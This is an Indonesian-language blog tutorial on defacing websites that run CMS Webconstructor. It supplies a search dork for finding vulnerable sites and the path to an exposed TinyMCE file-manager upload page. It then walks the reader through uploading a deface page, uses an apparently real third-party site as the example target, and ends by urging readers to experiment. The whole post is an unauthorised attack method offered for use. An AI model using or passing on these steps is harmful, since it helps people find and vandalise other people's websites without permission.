Deface: CMS Webconstructor Upload Vulnerability
Oke kita lanjut lagi dengan tutorial deface. Kali ini target kita adalah web dengan CMS Webconstructor yang memiliki celah untuk upload file. Seperti biasa celah upload file ini bisa kita gunakan untuk upload file deface kita 
Dork : intext:CMS: webconstructor.pl
Exploit : http://%5Blocalhost%5D/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Allow File : html ,pdf ,ppt ,txt ,doc ,jpg
Oke setelah mengetahui 3 hal di atas kita bisa lanjut deh tutorialnya
Pertama kita cari dulu target kita dengan dork diatas
Pilih salah satu target contoh: http://rofel.pl
Kemudian coba kita exploit dengan menambahkan /tiny_mce/plugins/filemanager/InsertFile/insert_file.phpsetelah http://rofel.pl
Maka url akan berubah menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Kemudian kita cek apakah keluar halaman file manager atau tidak, jika tidak ya cari target lain
Kalo berhasil akan muncul tampilan seperti ini
Kalo udah gini ya tinggal kita upload aja file deface kita, POC : http://rofel.pl/upload/index.html
Oke deh sekian dulu tutorial deface kali ini, selamat bereksperimen. Ingat!! Dork bisa kita modif sendiri
sumber
0 Response to "Deface: CMS Webconstructor Upload Vulnerability"
Post a Comment